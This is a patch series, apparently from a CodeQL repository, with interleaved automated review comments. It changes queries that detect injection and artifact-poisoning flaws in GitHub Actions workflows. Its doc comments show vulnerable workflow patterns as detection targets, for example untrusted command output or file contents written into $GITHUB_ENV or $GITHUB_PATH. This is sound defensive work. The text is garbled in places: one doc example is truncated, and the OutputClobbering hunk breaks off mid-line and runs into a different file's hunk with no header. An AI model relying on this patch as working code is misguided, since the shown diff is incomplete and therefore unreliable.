diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 6e1a5c0f2293..18ff398ebab2 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,6 +9,23 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ +bindingset[var] +predicate envToArgInjSink(string var, Run run, string command) { + exists(string argument, string cmd, string regexp, int command_group, int argument_group | + run.getACommand() = cmd and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + Bash::envReachingRunExpr(run, var, argument) and + exists(run.getInScopeEnvVarExpr(var)) + ) +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -21,10 +38,10 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; ArgumentInjectionFromEnvVarSink() { - exists(Run run, string var_name | - envToArgInjSink(var_name, run, command) and + exists(Run run, string var | + envToArgInjSink(var, run, command) and run.getScriptScalar() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var_name)) + exists(run.getInScopeEnvVarExpr(var)) ) or exists( 
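Review bot: `envToArgInjSink` is declared `bindingset[var]`, yet its body already binds `var` through `exists(run.getInScopeEnvVarExpr(var))`, so the annotation looks unnecessary, and the caller in `ArgumentInjectionFromEnvVarSink` in the next hunk then repeats the very same `exists(run.getInScopeEnvVarExpr(var))` after the call. I would drop the `bindingset[var]` line and the duplicated check in the caller so the condition lives in one place; if the bindingset is deliberate, to stop the predicate from being evaluated over every in-scope variable of every run, a comment saying so on that line would prevent the next reader from removing it.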
@@ -42,6 +59,33 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to an unsafe argument + * e.g. + * run: | + * BODY=$(git log --format=%s) + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromCommandSink() { + exists( + CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, + int command_group + | + run = source.getEnclosingRun() and + this.asExpr() = run.getScriptScalar() and + cmd = run.getACommand() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) + ) + } + + override string getCommand() { result = command } +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ @@ -71,6 +115,14 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + envToArgInjSink(var, run, _) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index b70155906143..31a9edd03b30 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
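Review bot: `ArgumentInjectionFromCommandSink` never connects the source command to the argument: `cmd = run.getACommand()` ranges over every command in the run and nothing requires the output of `source.getCommand()` to reach `argument`, so any Run that contains a `CommandSource` and any command listed in `argumentInjectionSinksDataModel` is reported even when the two are unrelated; contrast `envToArgInjSink` in the `@@ -9,6 +9,23 @@` hunk, which ties the variable to the argument through `Bash::envReachingRunExpr`. The doc example (`BODY=$(git log --format=%s)` followed by `sed "s/FOO/$BODY/g"`) also needs the one-hop assignment case, not only a direct `$(...)` inside the argument. I would add the link below, built from the `Bash` predicates introduced in this series.
```ql
      // … unchanged: exists(...) header and run/cmd binding …
      command = cmd.regexpCapture(regexp, command_group) and
      // the untrusted command's output must actually reach the injected argument
      (
        // sed "s/FOO/$(git log --format=%s)/g"
        Bash::containsCmdSubstitution(argument, source.getCommand())
        or
        // BODY=$(git log --format=%s); sed "s/FOO/$BODY/g"
        exists(string var, string value |
          run.getAnAssignment(var, value) and
          Bash::containsCmdSubstitution(value, source.getCommand()) and
          Bash::containsParameterExpansion(argument, var, _, _)
        )
      )
```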
@@ -274,6 +274,24 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(PoisonableStep step | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = step and + ( + succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(UsesStep) + ) + ) + or + exists(Run run | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe artifacts that is used in an insecure way. */ diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index 8cd589fa9f8c..ca72fe00d161 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -19,6 +19,22 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "code-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ 
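Review bot: The first disjunct of `isAdditionalFlowStep` propagates from every `ArtifactSource` to every `PoisonableStep` that follows it, with no relation between where the artifact was downloaded and what the poisonable step reads or executes, so a later step that runs a pinned tool on an unrelated directory is still treated as consuming the artifact. If neither `ArtifactSource` nor `PoisonableStep` exposes a path, this should at least be stated where the step is defined, e.g. `// Any poisonable step after the download is assumed to consume it; the download path is not tracked.`. Whether `getAFollowingStep()` is limited to the same job is not visible from this hunk and is worth noting in the same comment, since cross-job flow goes through the artifact upload/download pair instead.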
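Review bot: The second disjunct of `CodeInjectionConfig::isAdditionalFlowStep` taints the entire script of every later Run for which `Bash::outputsPartialFileContent(run, run.getACommand())` holds, regardless of whether the file being read is one the `FileSource` step could have produced; a `cat` of a file generated by the workflow itself becomes tainted as soon as a checkout or download precedes it. The same three-line disjunct is copied verbatim into the EnvPath, EnvVar and ActionsSHACheckout configs later in this patch, so a single shared predicate (e.g. `fileSourceToRunScript(DataFlow::Node pred, DataFlow::Node succ)`) would keep the four copies in sync when path sensitivity is improved. A one-line comment on the disjunct recording the over-approximation would help until then.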
diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
index a80032de3209..1f53c9384369 100644
--- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
+++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll
@@ -14,6 +14,9 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { }
  * e.g.
  * run: |
  * cat foo.txt >> $GITHUB_PATH
+ * echo "$(cat foo.txt)" >> $GITHUB_PATH
+ * FOO=$(cat foo.txt)
+ * echo "$FOO" >> $GITHUB_PATH
  */
 class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink {
   EnvPathInjectionFromFileReadSink() {
@@ -25,35 +28,34 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_PATH - Bash::fileToGitHubPath(run, _) - or - exists(string value | - run.getAWriteToGitHubPath(value) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubPath(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "${COMMIT_MESSAGE}" >> $GITHUB_PATH + */ +class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { + EnvPathInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. * e.g. 
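Review bot: The doc comment on the new `EnvPathInjectionFromCommandSink` says the untrusted data "flows to GITHUB_ENV", but the class constrains the write to `"GITHUB_PATH"` and the example itself appends to `$GITHUB_PATH`; the first line should read `* Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_PATH`. It is also worth saying in that comment that, unlike `EnvPathInjectionFromFileReadSink` just above, this sink is not gated on a preceding untrusted step because the `CommandSource` is the source, otherwise the asymmetry looks accidental. The constructor of `EnvPathInjectionFromFileReadSink` starts before this hunk.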
@@ -65,7 +67,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_PATH", var_name, run, _) and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) @@ -84,6 +86,28 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envpath-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 65c6938f0a43..dd6b8342185f 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
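Review bot: The first disjunct of `EnvPathInjectionConfig::isAdditionalFlowStep` propagates an env var into the script when it reaches any of `GITHUB_ENV`, `GITHUB_OUTPUT` or `GITHUB_PATH`, while `EnvPathInjectionFromEnvVarSink` in the previous hunk only requires that some in-scope variable reaches `GITHUB_PATH`; because the sink node is the whole script scalar, a tainted `$A` written to `$GITHUB_ENV` together with an untainted `$B` written to `$GITHUB_PATH` in the same Run is reported as a PATH injection. Restricting the step to the file this query is about removes that case: `Bash::envReachingGitHubFileWrite(run, var, "GITHUB_PATH", _)`. The residual imprecision that the sink does not name the tainted variable predates this change and would need the sink to carry `var` to fix fully.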
@@ -14,8 +14,12 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat test-results/.env >> $GITHUB_ENV + * * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV + * + * FOO=$(cat test-results/sha-number) + * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { 
@@ -27,37 +31,34 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_ENV - Bash::fileToGitHubEnv(run, _) - or - exists(string value | - run.getAWriteToGitHubEnv(_, value) and - ( - // e.g. - // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubEnv(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + */ +class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + EnvVarInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare env var. * e.g. 
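Review bot: `EnvVarInjectionFromFileReadSink` and `EnvVarInjectionFromCommandSink` are now textually identical to `EnvPathInjectionFromFileReadSink`/`EnvPathInjectionFromCommandSink` in the previous file apart from the `"GITHUB_ENV"`/`"GITHUB_PATH"` literal and the `fileToGitHubEnv`/`fileToGitHubPath` helper; a single predicate parameterised on the target file name (e.g. `predicate untrustedCommandReachesGitHubFile(Run run, string file)`) would remove the four copies and keep them aligned when one is corrected. Separately, `Bash::cmdReachingGitHubFileWrite(..., "GITHUB_ENV", _)` discards the name of the variable being written, so the doc comment should say that the key is not checked and any `NAME=...` line counts. The constructor of `EnvVarInjectionFromFileReadSink` starts before this hunk.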
@@ -69,9 +70,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) ) } } @@ -104,6 +105,28 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envvar-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 8541286f6e19..4f9eeef75793 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
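Review bot: `EnvVarInjectionConfig::isAdditionalFlowStep` lets an env var flow into the script when it reaches `GITHUB_ENV`, `GITHUB_OUTPUT` or `GITHUB_PATH`, but `EnvVarInjectionFromEnvVarSink` in the hunk above only requires that some in-scope variable reaches `"GITHUB_ENV"`, and since the sink is the whole script scalar the two variables need not be the same; a tainted `$A` echoed into `$GITHUB_OUTPUT` next to a harmless `$B` echoed into `$GITHUB_ENV` is then reported as env-var injection. The step should use the same file as the sink: `Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", _)`. If the three-file list is intentional (e.g. to share the step across queries), a comment explaining why is needed, because it reads as a copy from a sibling config.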
@@ -10,7 +10,7 @@ import codeql.actions.dataflow.FlowSources
 abstract class OutputClobberingSink extends DataFlow::Node { }
 
 /**
- * Holds if a Run step declares an environment variable with contents from a local file.
+ * Holds if a Run step declares a step output variable with contents from a local file.
  * e.g.
  * run: |
  * cat test-results/.vars >> $GITHUB_OUTPUT
@@ -21,58 +21,43 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { exists(Run run, Step step | ( - step instanceof UntrustedArtifactDownloadStep or + step instanceof UntrustedArtifactDownloadStep + or // This shoould be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - step.(Uses).getCallee() = "actions/checkout" or - step instanceof GitMutableRefCheckout or - step instanceof GitSHACheckout or - step instanceof GhMutableRefCheckout or + exists(Uses uses | + step = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + step instanceof GitMutableRefCheckout + or + step instanceof GitSHACheckout + or + step instanceof GhMutableRefCheckout + or step instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and + this.asExpr() = run.getScriptScalar() and ( - // e.g. - // cat test-results/.vars >> $GITHUB_OUTPUT - Bash::fileToGitHubOutput(run, _) - or - exists(string key, string value | - run.getAWriteToGitHubOutput(key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key - ) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. 
- // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubOutput(run, _) ) ) } } /** - * Holds if a Run step declares an environment variable, uses it to declare env var. + * Holds if a Run step declares an environment variable, uses it in a step variable output. * e.g. * env: * BODY: ${{ github.event.comment.body }} @@ -81,15 +66,15 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var_name, string key | - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + exists(Run run, string var, string field | + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key + exists(string field2 | + run.getAWriteToGitHubOutput(field2, _) and + not field2 = field ) and - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(run.getInScopeEnvVarExpr(var)) and run.getScriptScalar() = this.asExpr() ) } 
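Review bot: The tightened `actions/checkout` condition only requires that a `ref` argument exists, so `ref: main` or a pinned tag is treated as an untrusted checkout exactly like a PR head ref; the comment above explains why `PRHeadCheckoutStep` cannot be used but not that this is a deliberate over-approximation, and it carries three typos (`shoould`, `anc`, `Monolitic` — the CodeQL error is "non-monotonic recursion"). I would replace it with two lines: `// Ideally: step instanceof PRHeadCheckoutStep, but that class uses taint tracking and triggers a non-monotonic recursion error here.` and `// Workaround: accept any actions/checkout with an explicit ref; this over-approximates because non-PR refs also match.`. If `Uses.getArgument("ref")` yields the literal expression text, a cheap narrowing would be to require it to contain `head`, though the expected-output files would then need regenerating. The `TODO` in the next hunk about ordering of the two output writes is still open as well.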
@@ -113,10 +98,9 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string output_line, string clobbering_line, string var_name | - run.getScript().splitAt("\n") = output_line and - Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and - run.getScript().splitAt("\n") = clobbering_line and + exists(Run run, string clobbering_line, string var_name | + Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and + run.getACommand() = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() @@ -124,13 +108,36 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * run: | + * # VULNERABLE + * PR="$(; @@ -93,6 +102,15 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { uses.getArgumentExpr("ref") = sink.asExpr() ) } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } module ActionsSHACheckoutFlow = TaintTracking::Global; @@ -139,7 +157,7 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.merge_group\\.head_sha\\b", "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics - "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bmerge_sha\\b", "\\bpr_head_sha\\b" ], _, _) ) } 
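Review bot: `clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*")` has no terminator after `var_name`, so with an in-scope variable `PR` it also matches `echo $PR_NUMBER` or `echo ${PR_TITLE}`; appending a boundary, e.g. `... + var_name + "(\\b|\\}).*"`, limits it to the variable actually in scope. That line is unchanged context, but this hunk just switched `clobbering_line` to come from `run.getACommand()` rather than a raw script line, so it is the natural place to tighten it. Note also that `var_name` is interpolated into the regex unescaped, which is only safe while `getInScopeEnvVarExpr` names are limited to `[A-Za-z0-9_]`; a one-line comment recording that assumption would help.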
@@ -156,7 +174,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics - "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bmerge_ref\\b", "\\bpr_head_ref\\b", // env vars "GITHUB_HEAD_REF", ], _, _) From 1e749ae6d5ddff29c0bd1bac751c75ab5bbdb2df Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:39 +0200 Subject: [PATCH 576/707] Add new poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1543e2d8d459..aa5148d7cf63 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -52,6 +52,7 @@ extensions: - ["rails\\s+assets:precompile"] - ["rubocop"] - ["sed\\s+-f"] + - ["sonar-scanner"] - ["stylelint"] - ["terraform"] - ["tflint"] From 99e92af0342654cd86e600f03207b8aa005e7d24 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:57 +0200 Subject: [PATCH 577/707] Update tests --- .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.ql | 2 +- .../.github/workflows/calling_composite.yml | 0 .../.github/workflows/calling_workflow.yml | 0 .../.github/workflows/reusable_workflow.yml | 0 .../CompositeActionsSinks.expected | 0 .../CompositeActionsSinks.qlref | 0 .../CompositeActionsSources.expected | 0 .../CompositeActionsSources.qlref | 0 .../CompositeActionsSummaries.expected | 0 .../CompositeActionsSummaries.qlref | 0 .../ReusableWorkflowsSinks.expected | 0 .../ReusableWorkflowsSinks.qlref | 0 .../ReusableWorkflowsSources.expected | 0 .../ReusableWorkflowsSources.qlref | 0 .../ReusableWorkflowsSummaries.expected | 0 .../ReusableWorkflowsSummaries.qlref | 0 .../CWE-020 => Models}/action1/action.yml | 0 .../CWE-074/OutputClobberingHigh.expected | 16 +- .../CWE-077/.github/workflows/test13.yml | 23 +++ .../CWE-077/.github/workflows/test14.yml | 30 ++++ .../CWE-077/.github/workflows/test15.yml | 29 ++++ .../CWE-077/.github/workflows/test8.yml | 2 - .../CWE-077/EnvPathInjectionCritical.expected | 11 +- .../CWE-077/EnvPathInjectionMedium.expected | 11 +- .../CWE-077/EnvVarInjectionCritical.expected | 77 +++++---- .../CWE-077/EnvVarInjectionMedium.expected | 65 ++++---- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 49 +++--- .../CWE-088/ArgumentInjectionMedium.expected | 31 ++-- .../CWE-094/.github/workflows/test.yml | 15 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test14.yml | 51 ++++++ .../CWE-094/.github/workflows/test15.yml | 38 +++++ .../CWE-094/CodeInjectionCritical.expected | 146 +++++++++++------- .../CWE-094/CodeInjectionMedium.expected | 134 ++++++++++------ .../ArtifactPoisoningCritical.expected | 38 ++--- .../CWE-829/ArtifactPoisoningMedium.expected | 38 ++--- 38 files changed, 544 insertions(+), 280 deletions(-) rename 
ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_composite.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/reusable_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/action1/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
